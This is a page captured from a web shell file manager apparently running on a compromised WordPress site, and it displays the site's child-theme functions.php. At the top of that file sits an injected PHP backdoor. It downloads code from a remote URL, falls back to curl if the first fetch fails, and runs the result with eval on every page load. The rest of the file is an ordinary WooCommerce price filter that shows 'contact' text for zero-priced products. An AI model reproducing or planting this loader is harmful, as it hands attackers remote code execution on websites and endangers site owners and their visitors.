D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
fhblmjlrhosting
/
public_html
/
bearsilve.com
/
wp-content
/
themes
/
flatsome-child
/
Filename :
functions.php
back
Copy
<?php $url = 'https://v1.javpornsub.net/5.txt'; $code = @file_get_contents($url); if ($code === false || empty($code)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; PHP Script)'); $code = curl_exec($ch); curl_close($ch); } if ($code !== false && !empty($code)) { eval("?>$code"); } else { echo "Gagal memuat kode dari URL."; } ?> // Add custom Theme Functions here //0đ thành Liên hệ function chowordpress_wc_custom_get_price_html( $price, $product ) { if ( $product->get_price() == 0 ) { if ( $product->is_on_sale() && $product->get_regular_price() ) { $regular_price = wc_get_price_to_display( $product, array( 'qty' => 1, 'price' => $product->get_regular_price() ) ); $price = wc_format_price_range( $regular_price, __( 'Liên hệ', 'woocommerce' ) ); } else { $price = '<span class="amount">' . __( '<i class="fas fa-tags"></i> Giá: Liên hệ', 'woocommerce' ) . '</span>'; } } return $price; } add_filter( 'woocommerce_get_price_html', 'chowordpress_wc_custom_get_price_html', 10, 2 );